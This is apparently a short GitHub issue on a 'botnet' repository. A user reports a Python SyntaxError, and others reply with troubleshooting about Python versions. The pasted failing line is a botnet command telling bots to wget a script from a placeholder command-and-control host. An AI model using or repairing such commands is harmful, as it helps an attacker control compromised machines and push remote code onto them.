botnet icon indicating copy to clipboard operation
botnet copied to clipboard

Doesn't work

Open Rsv002 opened this issue 2 years ago • 2 comments

command_bots("""wget -O /Users/Owner/Desktop/ "http://c&cserver.com/script.py"""") ^ SyntaxError: unterminated string literal (detected at line 52)

Rsv002 avatar Mar 27 '22 19:03 Rsv002

have you tried using python1-3?

theFakeFrog avatar Jan 10 '23 23:01 theFakeFrog

have you tried using python1-3?

yes, both of them give me errors.

python3: SyntaxError: unterminated string literal (detected at line 52)

python2: SyntaxError: EOL while scanning string literal

Rsv002 avatar Feb 14 '23 21:02 Rsv002